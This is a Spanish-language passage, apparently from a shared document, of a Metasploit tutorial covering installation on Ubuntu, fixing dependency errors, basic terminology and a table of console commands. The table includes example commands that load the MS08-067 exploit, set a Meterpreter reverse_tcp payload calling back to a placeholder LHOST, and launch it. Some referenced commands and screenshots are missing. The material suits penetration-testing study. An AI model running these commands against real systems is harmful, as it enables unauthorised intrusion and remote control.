Está en la página 1de 2

CONFIGURAR METASPLOIT EN UBUNTU

Configurar Metasploit en Ubuntu 12.04 LTS es un trabajo realmente fácil. Simplemente descargue
la última versión de Ubuntu desde el sitio web oficial de Ubuntu e instálela en una máquina
diferente; alternativamente, repita el proceso en un entorno virtual como lo hicimos para Backtrack-
Linux. Ahora, después de configurar Ubuntu, necesitamos descargar el instalador de Metasploit
para Linux, basado en la arquitectura de su máquina. Después de descargar el instalador basado en
Linux, simplemente realice los siguientes pasos:

1. Abra el terminal y busque el directorio del instalador de Metasploit, como se muestra en la


siguiente captura de pantalla:

Manejo de estados de error


A veces puede ocurrir que enfrentemos algunos errores de instalación al instalar el marco
Metasploit en el sistema. Sin embargo, veremos cómo podemos lidiar con estos errores. Pueden
producirse errores durante una instalación basada en Windows y Linux. Sin embargo, estos son
fáciles de superar si se tratan adecuadamente.

Errores en la instalación basada en Linux


En una instalación basada en Linux, pueden producirse errores debido a dependencias de archivos
rotos y pueden provocar el fallo de la instalación. Si la instalación falla, podemos corregir estas
dependencias manualmente y podemos configurar Metasploit manualmente a través del terminal
descargando e instalando las dependencias correctas.

Para descargar todas las dependencias que necesita Metasploit, podemos usar el siguiente comando:

El comando anterior descargará todas las dependencias esenciales, como build-essentials, Ruby,
PostgreSQL y todas las demás dependencias principales requeridas por Metasploit.
En caso de que el error sea parte de las bibliotecas de Ruby, podemos usar el siguiente comando
para instalar todas las bibliotecas de Ruby esenciales que usaron mi Metasploit:

$ sudo gem install wirble sqlite3 bundler

Realizar una prueba de penetración con Metasploit


Después de configurar el entorno de trabajo, ahora estamos listos para realizar nuestra primera
prueba de penetración con Metasploit. Sin embargo, antes de comenzar con la prueba, recordemos
algunas de las funciones y terminologías básicas utilizadas en el marco Metasploit.

Recordando los conceptos básicos de Metasploit


Después de ejecutar Metasploit, podemos enumerar todos los comandos viables disponibles en el
marco escribiendo help en la consola de Metasploit. Recordemos los términos básicos utilizados en
Metasploit, que son los siguientes:

• Exploits: este es un fragmento de código que, cuando se ejecuta, activará la vulnerabilidad


en el objetivo.
• Payload: este es un fragmento de código que se ejecuta en la victima después de que se
realiza una explotación exitosa. Básicamente, define el tipo de acceso y las acciones que
necesitamos obtener en el sistema victima.
• Auxiliary: son módulos que proporcionan funcionalidades adicionales como escaneo,
fuzzing, sniffing y mucho más.
• Encoders: los codificadores se utilizan para ofuscar módulos para evitar ser detectados por
un mecanismo de protección como un antivirus o un firewall.

Recordemos ahora algunos de los comandos básicos de Metasploit y veamos qué se supone que
deben hacer, como se muestra en la siguiente tabla:

Comando Uso Ejemplo


use Para seleccionar un módulo en msf>use exploit/windows/smb/
[Auxiliary/Exploit/ particular para comenzar a trabajar ms08_067_netapi
Payload/Encoder]
show [exploits/ Para ver la lista de módulos msf>show exploits
payloads/ encoder/ disponibles de un tipo particular
auxiliary/options]
set [options/ Para establecer un valor para un msf>set payload windows/
payload] objeto en particular meterpreter/reverse_tcp
msf>set LHOST 111.111.111.111
setg [options/ Para establecer un valor a un objeto msf>setg payload windows/
payload] particular globalmente para que los meterpreter/reverse_tcp
valores no cambien cuando se msf>setg LHOST 111.111.111.111
enciende un módulo
run Para iniciar/lanzar un módulo auxiliar msf>run
después de configurar todas las
opciones requeridas
exploit Para lanzar un exploit msf>exploit
back Para anular la selección de un módulo msf(ms08_067_netapi)>back
y retroceder msf>
Info Para enumerar la información msf>info exploit/windows/smb/
relacionada con un exploit / módulo / ms08_067_netapi
auxiliary particular
Search Para encontrar un modulo particular msf>search netapi
check Para verificar si un objetivo particular msf>check
es vulnerable a la explotación o no
Sessions Para enumerar las sesiones msf>sessions [session number]
disponibles

También podría gustarte